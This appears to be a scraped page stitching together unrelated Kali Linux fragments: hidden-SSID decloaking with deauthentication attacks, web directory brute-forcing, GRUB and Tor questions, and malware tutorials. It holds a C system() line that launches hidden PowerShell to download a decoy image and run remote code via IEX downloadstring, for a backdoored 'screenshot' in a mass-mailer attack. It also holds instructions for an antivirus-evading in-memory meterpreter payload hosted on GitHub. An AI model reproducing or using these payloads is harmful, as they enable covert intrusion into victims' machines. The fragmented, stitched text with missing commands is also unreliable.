Before getting into details of uncovering wirelss ssid network using kali linux,first let us know what is network ssid?

SSID stands for service set identifier (SSID).It is case sensitive 32 alphanumeric character.It is also know as network name of access point.If user stop the broadcasting of wireless network (SSID) from gateway then inbuilt wifi scanner can't detect the particuler ssid|wireless network.

There are lot's of different method to uncover the hidden wireless ssid like use windows tool,android tool(HiddenSSID Enabler) but here we are discovering the hidden wireless ssid using kali linux terminal.

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From the above command, reveal hidden wireless network with bssid address BC:F6:85:BF:4F:70.BUT we are interested in the name of wireless network and ssid name display only if the client re-authenticates to the hidden ssid network.Here we will use the aireplay-ng tool to deauthenticate all the connected client from wireless hidden when de-authenticated client try to re-authenticate,we get the ssid name of hidden network.

Now open a new terminal window and leave airodump-ng running.

Run the below command in the new terminal.

In my last tutorial, I talked about creating a virus inside of a Word Document in the scenario of a mass-mailer attack. In this post, however, I'm going to be covering creating a fake image or screenshot with a meterpreter backdoor hidden inside to be used in a similar scenario.

system("powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile(' ', 'C:\\Users\\Public\\screenshot.jpg') & start C:\\Users\\Public\\screenshot.jpg & powershell.exe \"IEX ((new-object net.webclient).downloadstring(' '))\"");

If you read my first tutorial, you might notice the added code: powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile(' ', 'C:\\Users\\Public\\screenshot.jpg') & start C:\\Users\\Public\\screenshot.jpg

executable code not working

after compiling the file when i open it with resource hacker

it showing that "it does not appear to have a valid resource format"

and i have compiled using "gcc complier" in kali linux

Please help!

Note: I have DWVA running at at port 80, so I ll be using that for the examples. Just replace that with your website URL or IP address. I'll also be using Kali linux as the attacking machine.

You can use DNS mode to find hidden subdomains in a target domain. For example, if you have a domain named, sub-domains like,, and so on can be found using Gobuster.

So basically I have a pretty flooded Grub bootloader, with older linux versions, 3 operating systems and memtests. What I want is to leave the operating systems only. I need to know how to do it manually, and I need someone to tell me what should I be aware of when a new kernel is released. Thanks in advance.

The update-grub script just makes entries for everything it finds in /boot, as far as I'm aware, so removing old linux-image (and linux-headers) packages via apt-get remove will clean up /boot and therefore clean up your grub config.

Despite the popular belief with some IT departments and technologists that hiding SSIDs is a security feature. On the surface this makes sense, after all how can you connect to something that you don't know is there. There was a point in time when many wireless networks were open and this was a useful feature if there was some reason you needed the network to be open and you didn't want people randomly connecting since for most users the "if you can't see it you can't connect to it" mantra was true enough. The problem is that anyone can use some basic tools to not only find out that your network exists but they can decloak them to recover the name which is what this post will look at. Just sitting in my house writing I can see 3 hidden SSIDs that are open, presumably because people felt like if they hide them there is no need to secure them. For this post I will show how we can decloak these types of networks and connect to them[1].

The first step to our ultimate goal of decloaking a hidden SSID is to find it. To do this we are going to monitor management frames on the various wireless channels. The management frames are typically unencrypted and visible to anyone listening on the channel. There are two tools that we can use for this goal and i'll provide a brief overview of using each. The information we are going to look for here is 1. the BSSID of the AP and 2. the channel the AP is on.

Once placing the interface into monitor mode is complete you will want to get a list of all APs that you are able to see. To do this fire up airodump using the command airodump-ng which will start scanning for wireless access points within range or if you want only hidden APs then add the --essid "" option[3]. APs with cloaked ESSIDs will have a name instead of a name like "SuperSecureWifi". Take a note of the ESSID you want to decloak and make note of it's BSSID and channel number. After you have this information you have a few options to decloak the network. One choice that works well for a busy AP is to simply restart airodump and set it to the channel of interest airodump-ng -c --bssid and watch for the ESSID to be shown. On networks that are not very busy this may take a while. After the kismet section we will see how to accelerate this by performing a deauthentication attack.

An alternative to monitoring for SSIDs is using kismet. To do this first launch kismet with the command kismet_server -c then in a new terminal launch the kismet client kismet_client. This may bring up a prompt about running as root if you are using the root user in Kali or another linux distro. After kismet starts to show SSIDs I then like to go up to sort and click on SSID. Then I will look in the list for a cloaked SSID with at least one client connected to it which can be done by using your arrow keys or the mouse to select different entries.

In this article, we will teach you how to discover SSIDs that is hidden from normal views. SSIDs (Service Set identifier) is nothing but the network name that we give during the configuration of the router or Access point. For security reasons sometimes people may hide it while configuring Access points to avoid normal people from accessing it. So let us see how can we find out such a hidden network. To find this out, we will use 3 inbuilt tools from Backtrack/Kali namely airmon-ng, airodump-ng, aireplay-ng.

This will sent a Deauth notification exactly 3 times to the SSID which will result in disconnection of all users currently using it. That will make them rejoin soon and that will get our SSID. Once you get the SSID you can tell the BackTrack/Kali Linux to associate with it by giving the command (Consider the hidden SSID we found out was ACCS-Student :

What is hidden WiFi networks? wifi hidden network is configure to be hidden so they do not broadcast their name (ESSID). This is considered, in their opinion, additional protection (along with the password).

I currently have tor installed on my Kali Linux laptop, I am trying to run a hidden service. Everything is working fine except I can't set a custom onion address. I have shallot installed and I already have my RSA private key for the domain I want. I keep putting the key inside:

The key stays there, but doesn't apply to the hostname file. Even if I change the onion link in the hostname file itself, when I restart Tor, the hostname file changes back to the original onion link I got when I created my hidden service. Please tell me what I'm doing wrong.

DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary-based attack against a web server and analyzing the response. DIRB main purpose is to help in professional web application auditing.

DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. DirBuster comes with a total of 9 different lists; this makes DirBuster extremely effective at finding those hidden files and directories.

Hello again friends! Today I will give a tutorial on how to create a payload that executes under 10 seconds and gives you a fully functioning meterpreter shell back to your kali linux machine. This is done under 20 lines of script. It's quite simple and works on any Windows machine with Powershell installed (Windows 7 and above comes preinstalled with this). I tested this first on my Windows 10 machine and works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin shall we?

Create a github account if you do not have one at =header-home. After doing that, make a new repository on github and then upload the payload you just made (there are tutorials on google for uploading files). You can upload the file a couple different ways. The easiest is just log on github from your kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use pastebin, upload to that!

What is going here in we are calling the windows + x button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up powershell, BUT IT OPENS IT UP HIDDEN. So the actual powershell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After powershell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, the second IEX string, you want replace the last link with whatever the link is to your script is on your github account. Remember the one you uploaded? You want to click on github, the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used pastebin, just place that link into the code. ff782bc1db

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